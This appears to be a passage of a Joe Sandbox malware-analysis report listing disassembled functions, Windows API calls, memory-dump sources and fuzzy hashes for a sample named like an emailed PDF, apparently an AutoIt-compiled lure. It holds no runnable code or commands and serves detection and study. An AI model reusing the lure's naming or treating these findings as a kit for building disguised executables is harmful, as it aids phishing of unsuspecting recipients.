                                                                                                          • API ID: ErrorFormatLastMessage
                                                                                                          • String ID:
                                                                                                          • API String ID: 3479602957-0
                                                                                                          • Opcode ID: 4352783d03ee831a296e6e8858b3a412b6762df3d0f563d1c1996e50b3b9b6cb
                                                                                                          • Instruction ID: 3c1d6db63b08def6aca680ccb489570a47d4026843d743ee134309c7e5f83f8f
                                                                                                          • Opcode Fuzzy Hash: 4352783d03ee831a296e6e8858b3a412b6762df3d0f563d1c1996e50b3b9b6cb
                                                                                                          • Instruction Fuzzy Hash: BBF0823514522DBBDB21BFA4DC48FEA776CBF08361F008166F909D6181D674A944CBA1
                                                                                                          Function 007A81CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007A8309), ref: 007A81E0
                                                                                                          • CloseHandle.KERNEL32(?,?,007A8309), ref: 007A81F2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                          • String ID:
                                                                                                          • API String ID: 81990902-0
                                                                                                          • Opcode ID: 9f65473554ca62b7aa36953ae475a5bff69ec406d72fc647df45b06dbc3170b1
                                                                                                          • Instruction ID: 2e3a4920c12140d0b56fb394e3ac908e35b45cba069ba8f36177c2f34df9de7e
                                                                                                          • Opcode Fuzzy Hash: 9f65473554ca62b7aa36953ae475a5bff69ec406d72fc647df45b06dbc3170b1
                                                                                                          • Instruction Fuzzy Hash: A7E0EC72011A10EFEB252B74EC09D777BFAEF04350714C92EF8AA84470DB66AC91DB54
                                                                                                          Function 0077A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00778D57,?,?,?,00000001), ref: 0077A15A
                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0077A163
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                          • String ID:
                                                                                                          • API String ID: 3192549508-0
                                                                                                          • Opcode ID: ad1ae0e169e6ef38e5eb7da79caf61ab602e3d20ec76683a9e2566eab59f24d4
                                                                                                          • Instruction ID: 723b5d1694736db26958cb6d26c585ab0e301c97f4adf93a1d29c4041af5661e
                                                                                                          • Opcode Fuzzy Hash: ad1ae0e169e6ef38e5eb7da79caf61ab602e3d20ec76683a9e2566eab59f24d4
                                                                                                          • Instruction Fuzzy Hash: 3FB09231055208ABCA002B95EC09B883F78EB44AA2F41C022F60E84060CB6654508A99
                                                                                                          Function 0077F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 45e1ab2c05fbb1ce24caa118c99cff984d817be705ef200ac487ec791203667a
                                                                                                          • Instruction ID: 332ba4654e375295ca9855a548825962888bd590095b1675ee3d57665bef7efc
                                                                                                          • Opcode Fuzzy Hash: 45e1ab2c05fbb1ce24caa118c99cff984d817be705ef200ac487ec791203667a
                                                                                                          • Instruction Fuzzy Hash: 86323662D2AF814DDB279634D972335A248AFBB3C4F15D737F819B99A6EB2CC4834104
                                                                                                          Function 0078242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 72959ec6af4520cb8c0d9e5e0967e8015a25299bf9fd9d5ff5779204470d67ac
                                                                                                          • Instruction ID: cad41e7eeacbea12eaa1f274067f3e80b0feae0f43b12e6be84a6f3b914b10ba
                                                                                                          • Opcode Fuzzy Hash: 72959ec6af4520cb8c0d9e5e0967e8015a25299bf9fd9d5ff5779204470d67ac
                                                                                                          • Instruction Fuzzy Hash: A4B10020D2AF804DD323A6398871336B75CAFBB2C5F52D71BFC2678D62EB2595834241
                                                                                                          Function 007B8889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __time64.LIBCMT ref: 007B889B
                                                                                                            • Part of subcall function 0077520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,007B8F6E,00000000,?,?,?,?,007B911F,00000000,?), ref: 00775213
                                                                                                            • Part of subcall function 0077520A: __aulldiv.LIBCMT ref: 00775233
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Time$FileSystem__aulldiv__time64
                                                                                                          • String ID:
                                                                                                          • API String ID: 2893107130-0
                                                                                                          • Opcode ID: ce141398042fcd46314e87106cd9e5517798c1e2a0af8e7823f35327a5ffcde0
                                                                                                          • Instruction ID: 3ac7f5984c603972bbe1b1ee9454dd9eff2531281d7999f495d34db6ee963cd3
                                                                                                          • Opcode Fuzzy Hash: ce141398042fcd46314e87106cd9e5517798c1e2a0af8e7823f35327a5ffcde0
                                                                                                          • Instruction Fuzzy Hash: 7D21DF72635610CBC729CF29D841B92B3E9EFA4310B288E6CE0F5CB2C0CA34A945CB54
                                                                                                          Function 007A87B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,007A8389), ref: 007A87D1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LogonUser
                                                                                                          • String ID:
                                                                                                          • API String ID: 1244722697-0
                                                                                                          • Opcode ID: 45566dd488d3ba071d984547ad0f5a54157b6ff9c241bc9c1b1c53574ef331fc
                                                                                                          • Instruction ID: 14337a7d297767fe570a9c8c1a36846ee17671748f66915a7136190f25b3d144
                                                                                                          • Opcode Fuzzy Hash: 45566dd488d3ba071d984547ad0f5a54157b6ff9c241bc9c1b1c53574ef331fc
                                                                                                          • Instruction Fuzzy Hash: 63D09E3226450EABEF019EA4DD05EAE3B69EB04B01F408511FE16D61A1C775D935AB60
                                                                                                          Function 0077A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0077A12A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                          • String ID:
                                                                                                          • API String ID: 3192549508-0
                                                                                                          • Opcode ID: ea86fbdfe1a4eb2f0fc859c6d4a6445623f880ba4b10c49a8aa14688b5b42caa
                                                                                                          • Instruction ID: 5929bcbe14cb47bef045c3d0c18237c3e1c9010939164d267bc6ccedf9c262b1
                                                                                                          • Opcode Fuzzy Hash: ea86fbdfe1a4eb2f0fc859c6d4a6445623f880ba4b10c49a8aa14688b5b42caa
                                                                                                          • Instruction Fuzzy Hash: F6A0113000020CABCA002B8AEC08888BFACEA002A0B008022F80E800228B32A8208A88
                                                                                                          Function 00768808 Relevance: .6, Instructions: 590COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 83e22f00db7317f6a4e389a4fb992c3219cf7c0b039bb9d783fe7c96662823a2
                                                                                                          • Instruction ID: 7a22d70dfadc0ae914a2d1e114821331c0065f8eb1d6339cba826b5a5a8615ae
                                                                                                          • Opcode Fuzzy Hash: 83e22f00db7317f6a4e389a4fb992c3219cf7c0b039bb9d783fe7c96662823a2
                                                                                                          • Instruction Fuzzy Hash: E6224630604606CBDF688A64C89477D77A1FB82344F28836BDD539B592EB7CAD91CA43
                                                                                                          Function 007721C5 Relevance: .3, Instructions: 345COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                          • Instruction ID: 24f34cd55aaf07f966b260f02ceae8d6adf5852492465438693d4067bcb23fe6
                                                                                                          • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                          • Instruction Fuzzy Hash: 5BC1B7322050930ADF2D463D843503EFBA15EA27F135A876DD4BBCB5D6EE18C926D720
                                                                                                          Function 007725FA Relevance: .3, Instructions: 341COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                          • Instruction ID: f726958c99285f5f9da3bb551f0418f0651453b66527985f6e4cdf6e609f117b
                                                                                                          • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                          • Instruction Fuzzy Hash: DAC1E7322050930ADF2D463EC43503EBBA15EA27F135A876DD4BBDB4D5EE28C925DB20
                                                                                                          Function 00771978 Relevance: .3, Instructions: 323COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                          • Instruction ID: 3b325f0687d125b3b4a985e83a38de58f99e5a7637de942cca30da7240aeeb09
                                                                                                          • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                          • Instruction Fuzzy Hash: 5AC1913230919309DF2D463D843503EBBA15EA27F139A876DD4BACB5D4EE28C925DB20
                                                                                                          Function 007C7806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • DeleteObject.GDI32(00000000), ref: 007C785B
                                                                                                          • DeleteObject.GDI32(00000000), ref: 007C786D
                                                                                                          • DestroyWindow.USER32 ref: 007C787B
                                                                                                          • GetDesktopWindow.USER32 ref: 007C7895
                                                                                                          • GetWindowRect.USER32(00000000), ref: 007C789C
                                                                                                          • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 007C79DD
                                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 007C79ED
                                                                                                          • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7A35
                                                                                                          • GetClientRect.USER32(00000000,?), ref: 007C7A41
                                                                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 007C7A7B
                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7A9D
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7AB0
                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7ABB
                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 007C7AC4
                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7AD3
                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 007C7ADC
                                                                                                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7AE3
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 007C7AEE
                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7B00
                                                                                                          • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,007E2CAC,00000000), ref: 007C7B16
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 007C7B26
                                                                                                          • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 007C7B4C
                                                                                                          • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 007C7B6B
                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7B8D
                                                                                                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7D7A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                                                                          • API String ID: 2211948467-2373415609
                                                                                                          • Opcode ID: 82a8b56943296bace44b9ba762a921b7dad2209a8ea8f42f1032b524ed0dba8f
                                                                                                          • Instruction ID: 34b41d105eafcd8179ab4c1c52bed0dd686e0f1032db95c59c12727952435ad5
                                                                                                          • Opcode Fuzzy Hash: 82a8b56943296bace44b9ba762a921b7dad2209a8ea8f42f1032b524ed0dba8f
                                                                                                          • Instruction Fuzzy Hash: 4D023971901119EFDB14DFA4DC89EAE7BB9FF48310F148159F916AB2A1CB78AD01CB60
                                                                                                          Function 007D356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CharUpperBuffW.USER32(?,?,007DF910), ref: 007D3627
                                                                                                          • IsWindowVisible.USER32(?), ref: 007D364B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuffCharUpperVisibleWindow
                                                                                                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                          • API String ID: 4105515805-45149045
                                                                                                          • Opcode ID: ee71f1c4b69014595dd69dba96692f41c93daeda8ff4a92b1fe16296f363de77
                                                                                                          • Instruction ID: 17d474c88e6e2a312962207f6b69561cf238b7fddce3ee6b52fa012448ca9ed9
                                                                                                          • Opcode Fuzzy Hash: ee71f1c4b69014595dd69dba96692f41c93daeda8ff4a92b1fe16296f363de77
                                                                                                          • Instruction Fuzzy Hash: ABD19370204301DBCB04EF10C85AA6E77B1AF95794F158459F9869B3E3DB39EE09CB92
                                                                                                          Function 007DA5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 007DA630
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 007DA661
                                                                                                          • GetSysColor.USER32(0000000F), ref: 007DA66D
                                                                                                          • SetBkColor.GDI32(?,000000FF), ref: 007DA687
                                                                                                          • SelectObject.GDI32(?,00000000), ref: 007DA696
                                                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 007DA6C1
                                                                                                          • GetSysColor.USER32(00000010), ref: 007DA6C9
                                                                                                          • CreateSolidBrush.GDI32(00000000), ref: 007DA6D0
                                                                                                          • FrameRect.USER32(?,?,00000000), ref: 007DA6DF
                                                                                                          • DeleteObject.GDI32(00000000), ref: 007DA6E6
                                                                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 007DA731
                                                                                                          • FillRect.USER32(?,?,00000000), ref: 007DA763
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 007DA78E
                                                                                                            • Part of subcall function 007DA8CA: GetSysColor.USER32(00000012), ref: 007DA903
                                                                                                            • Part of subcall function 007DA8CA: SetTextColor.GDI32(?,?), ref: 007DA907
                                                                                                            • Part of subcall function 007DA8CA: GetSysColorBrush.USER32(0000000F), ref: 007DA91D
                                                                                                            • Part of subcall function 007DA8CA: GetSysColor.USER32(0000000F), ref: 007DA928
                                                                                                            • Part of subcall function 007DA8CA: GetSysColor.USER32(00000011), ref: 007DA945
                                                                                                            • Part of subcall function 007DA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 007DA953
                                                                                                            • Part of subcall function 007DA8CA: SelectObject.GDI32(?,00000000), ref: 007DA964
                                                                                                            • Part of subcall function 007DA8CA: SetBkColor.GDI32(?,00000000), ref: 007DA96D
                                                                                                            • Part of subcall function 007DA8CA: SelectObject.GDI32(?,?), ref: 007DA97A
                                                                                                            • Part of subcall function 007DA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 007DA999
                                                                                                            • Part of subcall function 007DA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007DA9B0
                                                                                                            • Part of subcall function 007DA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 007DA9C5
                                                                                                            • Part of subcall function 007DA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007DA9ED
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
